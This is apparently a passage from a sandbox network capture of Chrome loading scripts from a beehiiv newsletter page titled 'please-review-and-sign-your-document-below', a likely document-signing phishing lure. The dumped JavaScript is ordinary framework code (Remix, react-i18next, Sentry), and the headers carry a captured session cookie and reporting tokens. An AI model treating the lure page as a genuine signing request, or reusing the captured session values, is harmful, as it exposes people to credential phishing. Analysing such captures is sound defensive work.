                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2f 72 65 6d 69 78 2e 72 75 6e 2f 67 75 69 64 65 73 2f 65 72 72 6f 72 73 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 0a 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 60 7d 7d 29 3b 69 66 28 75 79 28 74 29 29 72 65 74 75 72 6e 20 55 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 46 73 2c 7b 74 69 74 6c 65 3a 22 55 6e 68 61 6e 64 6c 65 64 20 54 68 72 6f 77 6e 20 52 65 73 70 6f 6e 73 65 21 22 7d 2c 55 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 31 22 2c 7b 73 74 79 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 34 70 78 22 7d 7d 2c 74 2e 73 74 61 74 75 73 2c 22 20 22 2c 74 2e 73 74 61 74 75 73 54 65 78 74 29 2c 65 29 3b 6c 65 74 20 6e 3b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 6e 3d 74 3b 65 6c 73 65
                                                                                                                                            Data Ascii: /remix.run/guides/errors for more information." ); `}});if(uy(t))return U.createElement(Fs,{title:"Unhandled Thrown Response!"},U.createElement("h1",{style:{fontSize:"24px"}},t.status," ",t.statusText),e);let n;if(t instanceof Error)n=t;else
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 77 67 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 65 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2c 6e 3d 7b 7d 3b 66 6f 72 28 6c 65 74 5b 61 2c 69 5d 6f 66 20 65 29 69 66 28 69 26 26 69 2e 5f 5f 74 79 70 65 3d 3d 3d 22 52 6f 75 74 65 45 72 72 6f 72 52 65 73 70 6f 6e 73 65 22 29 6e 5b 61 5d 3d 6e 65 77 20 47 6c 28 69 2e 73 74 61 74 75 73 2c 69 2e 73 74 61 74 75 73 54 65 78 74 2c 69 2e 64 61 74 61 2c 69 2e 69 6e 74 65 72 6e 61 6c 3d 3d 3d 21 30 29 3b 65 6c 73 65 20 69 66 28 69 26 26 69 2e 5f 5f 74 79 70 65 3d 3d 3d 22 45 72 72 6f 72 22 29 7b 69 66 28 69 2e 5f 5f 73 75 62 54 79 70 65 29 7b 6c 65 74 20 6c 3d 77 69 6e 64 6f 77 5b 69 2e 5f 5f 73 75 62 54 79 70 65 5d 3b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 22 66 75
                                                                                                                                            Data Ascii: wg(t){if(!t)return null;let e=Object.entries(t),n={};for(let[a,i]of e)if(i&&i.__type==="RouteErrorResponse")n[a]=new Gl(i.status,i.statusText,i.data,i.internal===!0);else if(i&&i.__type==="Error"){if(i.__subType){let l=window[i.__subType];if(typeof l=="fu


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            25192.168.2.1649739104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC849OUTGET /assets/useTranslation-CfKJAmGY.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4087
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"ff7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89dea400f9d-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 62 34 34 36 32 37 31 62 2d 65 61 32 34 2d 35 30 64 63 2d 61 30 35 32 2d 32 36 66 63 37 34 38 36 30 30 32 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b446271b-ea24-50dc-a052-26fc7486002e")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 65 5b 30 5d 3d 60 72 65 61 63 74 2d 69 31 38 6e 65 78 74 3a 3a 20 24 7b 65 5b 30 5d 7d 60 29 2c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 2e 2e 2e 65 29 7d 7d 63 6f 6e 73 74 20 54 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 65 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 54 5b 65 5b 30 5d 5d 7c 7c 28 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 54 5b 65 5b 30
                                                                                                                                            Data Ascii: ++)e[n]=arguments[n];typeof e[0]=="string"&&(e[0]=`react-i18next:: ${e[0]}`),console.warn(...e)}}const T={};function C(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&T[e[0]]||(typeof e[0]=="string"&&(T[e[0
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 6e 67 75 61 67 65 73 29 2c 21 30 29 3a 65 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 21 3d 3d 76 6f 69 64 20 30 3f 65 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 28 74 2c 7b 6c 6e 67 3a 6e 2e 6c 6e 67 2c 70 72 65 63 68 65 63 6b 3a 28 69 2c 6f 29 3d 3e 7b 69 66 28 6e 2e 62 69 6e 64 49 31 38 6e 26 26 6e 2e 62 69 6e 64 49 31 38 6e 2e 69 6e 64 65 78 4f 66 28 22 6c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 22 29 3e 2d 31 26 26 69 2e 73 65 72 76 69 63 65 73 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 62 61 63 6b 65 6e 64 26 26 69 2e 69 73 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 54 6f 26 26 21 6f 28 69 2e 69 73 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 54 6f 2c 74 29 29 72 65 74
                                                                                                                                            Data Ascii: anguages),!0):e.options.ignoreJSONStructure!==void 0?e.hasLoadedNamespace(t,{lng:n.lng,precheck:(i,o)=>{if(n.bindI18n&&n.bindI18n.indexOf("languageChanging")>-1&&i.services.backendConnector.backend&&i.isLanguageChangingTo&&!o(i.isLanguageChangingTo,t))ret
                                                                                                                                            2025-01-15 18:14:33 UTC892INData Raw: 74 6f 72 65 4f 6e 63 65 29 26 26 73 2e 65 76 65 72 79 28 72 3d 3e 6a 28 72 2c 6f 2c 63 29 29 2c 45 3d 4a 28 6f 2c 65 2e 6c 6e 67 7c 7c 6e 75 6c 6c 2c 63 2e 6e 73 4d 6f 64 65 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 3f 73 3a 73 5b 30 5d 2c 6d 29 2c 78 3d 28 29 3d 3e 45 2c 79 3d 28 29 3d 3e 7a 28 6f 2c 65 2e 6c 6e 67 7c 7c 6e 75 6c 6c 2c 63 2e 6e 73 4d 6f 64 65 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 3f 73 3a 73 5b 30 5d 2c 6d 29 2c 5b 49 2c 68 5d 3d 64 2e 75 73 65 53 74 61 74 65 28 78 29 3b 6c 65 74 20 4e 3d 73 2e 6a 6f 69 6e 28 29 3b 65 2e 6c 6e 67 26 26 28 4e 3d 60 24 7b 65 2e 6c 6e 67 7d 24 7b 4e 7d 60 29 3b 63 6f 6e 73 74 20 4c 3d 42 28 4e 29 2c 70 3d 64 2e 75 73 65 52 65 66 28 21 30 29 3b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74
                                                                                                                                            Data Ascii: toreOnce)&&s.every(r=>j(r,o,c)),E=J(o,e.lng||null,c.nsMode==="fallback"?s:s[0],m),x=()=>E,y=()=>z(o,e.lng||null,c.nsMode==="fallback"?s:s[0],m),[I,h]=d.useState(x);let N=s.join();e.lng&&(N=`${e.lng}${N}`);const L=B(N),p=d.useRef(!0);d.useEffect(()=>{const


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            26192.168.2.1649740104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC556OUTGET /assets/performance-dfU_ZKaW.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC900INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 84340
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"14974-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89df8dfc47f-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC469INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 63 66 65 65 64 34 30 2d 61 35 64 35 2d 35 31 34 64 2d 62 34 64 39 2d 38 30 62 66 31 65 61 35 39 39 61 35 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dcfeed40-a5d5-514d-b4d9-80bf1ea599a5")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2c 48 20 61 73 20 53 72 2c 72 20 61 73 20 61 74 2c 64 20 61 73 20 67 74 2c 6e 20 61 73 20 49 73 2c 49 20 61 73 20 79 72 2c 65 20 61 73 20 46 2c 66 20 61 73 20 55 2c 4a 20 61 73 20 53 2c 4b 20 61 73 20 24 74 2c 61 20 61 73 20 54 2c 75 20 61 73 20 6e 74 2c 54 20 61 73 20 54 72 2c 73 20 61 73 20 62 2c 4c 20 61 73 20 66 65 2c 4d 20 61 73 20 79 74 2c 4e 20 61 73 20 65 6e 2c 4f 20 61 73 20 6e 6e 2c 50 20 61 73 20 4f 2c 51 20 61 73 20 69 65 2c 52 20 61 73 20 52 73 2c 55 20 61 73 20 6b 74 2c 56 20 61 73 20 77 73 2c 57 20 61 73 20 52 6e 2c 58 20 61 73 20 4e 73 2c 59 20 61 73 20 76 72 2c 6d 20 61 73 20 78 2c 5a 20 61 73 20 5a 74 2c 53 20 61 73 20 4a 2c 5f 20 61 73 20 41 73 2c 71 20 61 73 20 54 74 2c 24 20 61 73 20 62 72 2c 61 30 20 61 73 20 77 6e 2c 61 31 20 61 73
                                                                                                                                            Data Ascii: ,H as Sr,r as at,d as gt,n as Is,I as yr,e as F,f as U,J as S,K as $t,a as T,u as nt,T as Tr,s as b,L as fe,M as yt,N as en,O as nn,P as O,Q as ie,R as Rs,U as kt,V as ws,W as Rn,X as Ns,Y as vr,m as x,Z as Zt,S as J,_ as As,q as Tt,$ as br,a0 as wn,a1 as
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 63 5d 2c 6c 2c 45 29 7d 7d 29 2c 63 7d 66 75 6e 63 74 69 6f 6e 20 46 6e 28 74 2c 65 29 7b 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 74 2e 6d 65 63 68 61 6e 69 73 6d 7c 7c 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 7d 2c 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 2e 2e 2e 74 2e 6d 65 63 68 61 6e 69 73 6d 2c 2e 2e 2e 74 2e 74 79 70 65 3d 3d 3d 22 41 67 67 72 65 67 61 74 65 45 72 72 6f 72 22 26 26 7b 69 73 5f 65 78 63 65 70 74 69 6f 6e 5f 67 72 6f 75 70 3a 21 30 7d 2c 65 78 63 65 70 74 69 6f 6e 5f 69 64 3a 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 6e 28 74 2c 65 2c 6e 2c 72 29 7b 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 74 2e 6d 65 63 68 61 6e 69 73 6d 7c 7c 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 7d 2c
                                                                                                                                            Data Ascii: c],l,E)}}),c}function Fn(t,e){t.mechanism=t.mechanism||{type:"generic",handled:!0},t.mechanism={...t.mechanism,...t.type==="AggregateError"&&{is_exception_group:!0},exception_id:e}}function Mn(t,e,n,r){t.mechanism=t.mechanism||{type:"generic",handled:!0},
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 3f 21 31 3a 6e 2e 6d 61 74 63 68 28 2f 5e 5c 64 2b 24 2f 29 3f 4a 73 28 72 29 3f 65 26 26 69 73 4e 61 4e 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 3f 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 6f 72 74 20 24 7b 65 7d 60 29 2c 21 31 29 3a 21 30 3a 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 72 6f 74 6f 63 6f 6c 20 24 7b 72 7d 60 29 2c 21 31 29 3a 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 72 6f 6a 65 63 74 49 64 20 24 7b 6e 7d 60 29 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 24 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 79 70 65 6f 66
                                                                                                                                            Data Ascii: ?!1:n.match(/^\d+$/)?Js(r)?e&&isNaN(parseInt(e,10))?(f.error(`Invalid Sentry Dsn: Invalid port ${e}`),!1):!0:(f.error(`Invalid Sentry Dsn: Invalid protocol ${r}`),!1):(f.error(`Invalid Sentry Dsn: Invalid projectId ${n}`),!1)}function $r(t){const e=typeof
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 4c 65 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 65 26 26 74 79 70 65 6f 66 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 6e 2e 68 69 64 64 65 6e 3d 21 30 2c 65 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 26 26 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 26 26 28 74 3d 48 65 28 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 29 29 2c 65 2e 68 65 61 64 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6e 29 7d 63 61 74 63 68 28 6e 29 7b 51 65 26 26 66 2e 77 61 72 6e 28 22 43 6f 75 6c 64 20 6e 6f 74 20 63 72 65 61 74 65 20
                                                                                                                                            Data Ascii: Le.document;if(e&&typeof e.createElement=="function")try{const n=e.createElement("iframe");n.hidden=!0,e.head.appendChild(n),n.contentWindow&&n.contentWindow.fetch&&(t=He(n.contentWindow.fetch)),e.head.removeChild(n)}catch(n){Qe&&f.warn("Could not create
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 65 3a 6e 2c 6d 73 67 3a 74 2c 75 72 6c 3a 65 7d 29 2c 47 74 26 26 21 47 74 2e 5f 5f 53 45 4e 54 52 59 5f 4c 4f 41 44 45 52 5f 5f 3f 47 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3a 21 31 7d 2c 52 2e 6f 6e 65 72 72 6f 72 2e 5f 5f 53 45 4e 54 52 59 5f 49 4e 53 54 52 55 4d 45 4e 54 45 44 5f 5f 3d 21 30 7d 6c 65 74 20 57 74 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4c 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 3b 75 74 28 65 2c 74 29 2c 64 74 28 65 2c 69 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 69 6f 28 29 7b 57 74 3d 52 2e 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 2c 52 2e 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                            Data Ascii: e:n,msg:t,url:e}),Gt&&!Gt.__SENTRY_LOADER__?Gt.apply(this,arguments):!1},R.onerror.__SENTRY_INSTRUMENTED__=!0}let Wt=null;function Lr(t){const e="unhandledrejection";ut(e,t),dt(e,io)}function io(){Wt=R.onunhandledrejection,R.onunhandledrejection=function(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 7d 63 6f 6e 73 74 20 66 6f 3d 5b 22 66 61 74 61 6c 22 2c 22 65 72 72 6f 72 22 2c 22 77 61 72 6e 69 6e 67 22 2c 22 6c 6f 67 22 2c 22 69 6e 66 6f 22 2c 22 64 65 62 75 67 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 22 77 61 72 6e 22 3f 22 77 61 72 6e 69 6e 67 22 3a 66 6f 2e 69 6e 63 6c 75 64 65 73 28 74 29 3f 74 3a 22 6c 6f 67 22 7d 66 75 6e 63 74 69 6f 6e 20 62 74 28 74 2c 65 3d 5b 5d 29 7b 72 65 74 75 72 6e 5b 74 2c 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 6d 6f 28 74 2c 65 29 7b 63 6f 6e 73 74 5b 6e 2c 72 5d 3d 74 3b 72 65 74 75 72 6e 5b 6e 2c 5b 2e 2e 2e 72 2c 65 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 55 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 31 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 72 20 6f 66 20 6e 29 7b 63
                                                                                                                                            Data Ascii: }const fo=["fatal","error","warning","log","info","debug"];function po(t){return t==="warn"?"warning":fo.includes(t)?t:"log"}function bt(t,e=[]){return[t,e]}function mo(t,e){const[n,r]=t;return[n,[...r,e]]}function Un(t,e){const n=t[1];for(const r of n){c
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 74 3a 22 72 65 70 6c 61 79 22 2c 72 65 70 6c 61 79 5f 72 65 63 6f 72 64 69 6e 67 3a 22 72 65 70 6c 61 79 22 2c 63 68 65 63 6b 5f 69 6e 3a 22 6d 6f 6e 69 74 6f 72 22 2c 66 65 65 64 62 61 63 6b 3a 22 66 65 65 64 62 61 63 6b 22 2c 73 70 61 6e 3a 22 73 70 61 6e 22 2c 73 74 61 74 73 64 3a 22 6d 65 74 72 69 63 5f 62 75 63 6b 65 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 6f 5b 74 5d 7d 66 75 6e 63 74 69 6f 6e 20 48 72 28 74 29 7b 69 66 28 21 74 7c 7c 21 74 2e 73 64 6b 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 6e 61 6d 65 3a 65 2c 76 65 72 73 69 6f 6e 3a 6e 7d 3d 74 2e 73 64 6b 3b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 65 2c 76 65 72 73 69 6f 6e 3a 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 6f 28 74 2c 65 2c 6e 2c 72 29 7b 63 6f 6e
                                                                                                                                            Data Ascii: t:"replay",replay_recording:"replay",check_in:"monitor",feedback:"feedback",span:"span",statsd:"metric_bucket"};function Bn(t){return So[t]}function Hr(t){if(!t||!t.sdk)return;const{name:e,version:n}=t.sdk;return{name:e,version:n}}function yo(t,e,n,r){con
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 65 73 73 22 7c 7c 73 3d 3d 3d 22 6f 70 74 69 6f 6e 61 6c 41 63 63 65 73 73 22 3f 28 65 3d 6e 2c 6e 3d 6f 28 6e 29 29 3a 28 73 3d 3d 3d 22 63 61 6c 6c 22 7c 7c 73 3d 3d 3d 22 6f 70 74 69 6f 6e 61 6c 43 61 6c 6c 22 29 26 26 28 6e 3d 6f 28 28 2e 2e 2e 69 29 3d 3e 6e 2e 63 61 6c 6c 28 65 2c 2e 2e 2e 69 29 29 2c 65 3d 76 6f 69 64 20 30 29 7d 72 65 74 75 72 6e 20 6e 7d 63 6f 6e 73 74 20 59 74 3d 52 3b 66 75 6e 63 74 69 6f 6e 20 4e 6f 28 29 7b 63 6f 6e 73 74 20 74 3d 59 74 2e 63 68 72 6f 6d 65 2c 65 3d 74 26 26 74 2e 61 70 70 26 26 74 2e 61 70 70 2e 72 75 6e 74 69 6d 65 2c 6e 3d 22 68 69 73 74 6f 72 79 22 69 6e 20 59 74 26 26 21 21 59 74 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 26 26 21 21 59 74 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74
                                                                                                                                            Data Ascii: ess"||s==="optionalAccess"?(e=n,n=o(n)):(s==="call"||s==="optionalCall")&&(n=o((...i)=>n.call(e,...i)),e=void 0)}return n}const Yt=R;function No(){const t=Yt.chrome,e=t&&t.app&&t.app.runtime,n="history"in Yt&&!!Yt.history.pushState&&!!Yt.history.replaceSt
